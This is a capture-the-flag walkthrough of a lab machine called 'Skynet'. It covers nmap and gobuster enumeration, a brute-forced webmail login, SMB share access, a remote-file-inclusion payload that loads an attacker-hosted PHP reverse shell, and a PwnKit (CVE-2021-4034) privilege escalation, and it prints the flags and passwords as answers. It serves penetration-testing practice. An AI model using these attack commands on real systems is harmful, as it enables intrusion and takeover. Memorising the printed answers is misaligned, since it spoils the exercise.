$ nmap -sC -sV <MACHINE_IP>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 992331bbb1e943b756944cb9e82146c5 (RSA)
| 256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_ 256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING UIDL CAPA RESP-CODES TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 post-login more listed have capabilities ID LITERAL+ LOGINDISABLEDA0001 IDLE LOGIN-REFERRALS OK Pre-login ENABLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2023-05-07T05:07:19
|_ start_date: N/A
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-05-07T00:07:19-05:00
└─$ gobuster dir -u http://10.10.71.82/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.82/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 310] [--> http://10.10.71.82/admin/]
/ai (Status: 301) [Size: 307] [--> http://10.10.71.82/ai/]
/config (Status: 301) [Size: 311] [--> http://10.10.71.82/config/]
/squirrelmail (Status: 301) [Size: 317] [--> http://10.10.71.82/squirrelmail/]
/css (Status: 301) [Size: 308] [--> http://10.10.71.82/css/]
/js (Status: 301) [Size: 307] [--> http://10.10.71.82/js/]
===============================================================
2023/05/07 11:25:45 Finished
===============================================================
get <FileName>
We Have Found a List of Passwords in log1.txt
So Let's use the file of passwords to Bruteforce the login /squirrelmai
using Burpsuite
Sniper
as attack typeWe Found a Redirect to Webmail.php
which seems to be Interesting, so copy and paste the password into the login field
Voila!! We Found the Password : )
Ans: cyborg007haloterminator
I Used Rapid Tables to Decrypt the Message
2. We got the password so let’s log in to /milesdyson
share with the username milesdyson
and Password we Found in the Mail )s{A&2Z=F^n_E.B`
We are In, Now let’s explore!!
$ smbclient //10.10.71.82/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.smb: \> ls
. D 0 Tue Sep 17 14:35:47 2019
.. D 0 Wed Sep 18 09:21:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:35:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:35:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:35:14 2019
notes D 0 Tue Sep 17 14:48:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:35:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:35:14 2019
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:48:40 2019
.. D 0 Tue Sep 17 14:35:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:31:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:31:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:31:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:31:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:31:29 2019
====> important.txt N 117 Tue Sep 17 14:48:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:31:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:31:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:31:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:31:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:31:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:31:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:31:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:31:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:31:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:31:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:31:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:31:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:31:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:31:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:31:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:31:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:31:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:31:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:31:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:31:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:31:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:31:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:31:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:31:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:31:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:31:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:31:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:31:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:31:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:31:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:31:29 2019
9204224 blocks of size 1024. 5819264 blocks available
We found a File Called Information.txt
which the hidden Directory
Ans: /45kra24zxs28v3yd
Ans: Remote File Inclusion
Now we found the Hidden Directory so let’s try to brute-force further with Goubuster
gobuster dir -u http://<Machine-IP>/45kra24zxs28v3yd -w <Wordlist-Location>
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.209/45kra24zxs28v3yd
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 418]
/administrator (Status: 301) [Size: 333] [--> http://10.10.223.209/45kra24zxs28v3yd/administrator/] ===============================================================
Finished
===============================================================
On googling about this, we found a File Inclusion Vulnerability
For this, we can run Simple python server
to upload a reverse shell
/var/www/html
directory or your /home
directory with the file name as php_reverse_shell.php
and make sure to add your system IP and port 4444
inside the reverse_shell File3. Start a Reverse Listener using netcat with the port you used on reverse shell
4. Now Let’s execute the below Payload
http://<Machine_IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<Your-System-IP>/php_reverse_shell.php
We got the reverse shell, cd /home
and cat user.txt
Ans: 7ce5c2109a40f958099283600a9ae807
First let’s make the terminal Interactive using Python!
python3 -c "import pty;pty.spawn('/bin/bash')"
/var/www/html
or your /home
directory3. Now let’s change the file permission then Execute the File!!
Let’s download the files and move it to the target machine!!
git clone https://github.com/berdav/CVE-2021-4034
zip exploit CVE-2021-4034 -r
Move the zip files to /var/home/www/
or /home
then download it on the target machine using wget
cd CVE-2021-4034
make
./cve-2021–4034
cd /root
cat root.txt
Ans: 3f0372db24753accc7179a282cd6a949